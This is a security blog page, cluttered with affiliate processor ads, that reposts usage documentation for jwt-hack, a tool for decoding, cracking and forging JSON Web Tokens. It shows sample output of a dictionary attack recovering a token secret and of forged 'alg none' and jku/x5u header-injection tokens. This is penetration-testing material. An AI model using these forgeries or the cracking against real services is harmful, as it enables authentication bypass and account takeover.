RedPacket Security

InfoSec News & Tutorials

News 

JWT-Hack – Tool To En/Decoding JWT, Generate Payload For JWT Attack And Very Fast Cracking(Dict/Brutefoce)

admin , , , ,
Click the icon to Follow me:- twitterTelegramRedditDiscord

jwt hack 1

The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 6 cores and 12 processing threads bundled with the quiet AMD wraith stealth cooler max temps 95°C 4 2 G...
AMD Ryzen 5 3600 6-Core, 12-Thread Unlocked Desktop Processor with Wraith Stealth Cooler $199.99
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 6 cores and 12 processing threads bundled with the quiet AMD wraith stealth cooler max temps 95°C 4 2 G... read more
(as of January 19, 2021 - More infoProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 8 cores and 16 processing threads, bundled with the AMD Wraith Prism cooler with color controlled LED s...
AMD Ryzen 7 3700X 8-Core, 16-Thread Unlocked Desktop Processor with Wraith Prism LED Cooler $324.99
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 8 cores and 16 processing threads, bundled with the AMD Wraith Prism cooler with color controlled LED s... read more
(as of January 19, 2021 - More infoProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 12 cores and 24 processing threads, bundled with the AMD Wraith Prism cooler with color controlled LED ...
AMD Ryzen 9 3900X 12-core, 24-thread unlocked desktop processor with Wraith Prism LED Cooler $499.00
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 12 cores and 24 processing threads, bundled with the AMD Wraith Prism cooler with color controlled LED ... read more
(as of January 19, 2021 - More infoProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)

jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)

Installation

go-get(dev version)

$ go get -u github.com/hahwul/jwt-hack

homebrew

$ brew tap hahwul/jwt-hack
$ brew install jwt-hack

snapcraft

$ sudo snap install jwt-hack

Usage

   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L
88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p
-------------------------
Hack the JWT(JSON Web Token) | by @hahwul | v1.0.0

Usage:
  jwt-hack [command]

Available Commands:
  crack       Cracking JWT Token
  decode      Decode JWT to JSON
  encode      Encode json to JWT
  help        Help about any command
payload     Genera   te JWT Attack payloads
  version     Show version

Flags:
  -h, --help   help for jwt-hack

jwt hack 9

Encode mode(JSON to JWT)

$ jwt-hack encode '{"json":"format"}' --secret={YOUR_SECRET}

e.g

$ jwt-hack encode '{"test":"1234"}' --secret=asdf
   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L
88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p
-------------------------
INFO[0000] Encoded result                                algorithm=HS256
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoiMTIzNCJ9.JOL1SYkRZYUz9GVny-DgoDj60C0RLz929h1_fFcpqQA

Decode mode(JWT to JSON)

$ jwt-hack decode {JWT_CODE}

e.g

$ jwt-hack decode eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L
88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p
-------------------------
INFO[0000] Decoded data(claims)                          header="{"alg":"HS256","typ":"JWT"}" method="&{HS256 5}"
{"iat":1516239022,"name":"John Doe","sub":"1234567890"}

Crack mode(Dictionary attack / BruteForce)

$ jwt-hack crack -w {WORDLIST} {JWT_CODE}

e.g

You may be interested in...

  • Cyber Bully
  • A Battle of Equals
  • Cyber Warfare – Truth, Tactics, and Strategies: Strategic concepts and truths to help you and your organization survive on the battleground of cyber warfare
  • The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats
  • Hacked

    • $ jwt-hack crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA -w samples/wordlist.txt

       d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
       88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
       88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L
    88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p
    -------------------------
    [*] Start dict cracking mode
    INFO[0000] Loaded words (remove duplicated)              size=16
    INFO[0000] Invalid signature                             word=fas
    INFO[0000] Invalid signature                             word=asd
    INFO[0000] Invalid signature                             word=1234
    INFO[0000] Invalid signature                             word=efq
    INFO[0000] Invalid signature                             word=asdf
    INFO[0000] Invalid signature                             word=2q
    INFO[0000] Found! Token signature secret is test         Signature=Verified Word=test
    INFO[0000] Invalid signature                             word=dfas
    INFO[0000] Invalid signature                             word=ga
    INFO[0000] Invalid signature                             word=f
    INFO[0000] Invalid signature                             word=ds
    INFO[0000] Invalid signature                             word=sad
    INFO[0000] Invalid signature                             word=qsf
    ...
    INFO[0000] Invalid signature                             word=password
    INFO[0000] Invalid signature                             word=error
    INFO[0000] Invalid signature                             word=calendar
    [+] Found! JWT signature secret: test
    [+] Finish crack mode

    Payload mode(Alg none attack, etc..)

    $ jwt-hack payload {JWT_CODE}

    e.g

    $ jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA
       d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
       88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
       88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L
    88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p
    -------------------------
    payload called
    INFO[0000] Generate none payload                         header="{"alg":"none","typ":"JWT"}" payload=none
    eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
    INFO[0000] Generate NonE payload                         header="{"alg":"NonE","typ":"JWT"}" payload=NonE
    eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDI   yfQ.
    INFO[0000] Generate NONE payload                         header="{"alg":"NONE","typ":"JWT"}" payload=NONE
    eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
    INFO[0000] Generate jku payload                          header="{"alg":"hs256","jku":"https://www.google.com","typ":"JWT"}" payload=jku
    eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
    INFO[0000] Generate x5u payload                          header="{"alg":"hs256","x5u":"https://www.google.com","typ":"JWT"}" payload=x5u
    eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
    Download Jwt-Hack

    If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

    Patreon

    Original Source

    You May Also Like

    crlfuzz 6

    CRLFuzz – A Fast Tool To Scan CRLF Vulnerability Written In Go

    admin
    GettyImages 73915751 e1605362480220 1024x614 1

    Malspam campaign spoofs email chains to install IcedID info-stealer

    admin
    osint

    How Content Abuse is giving rise to online Frauds, explains SIFT

    admin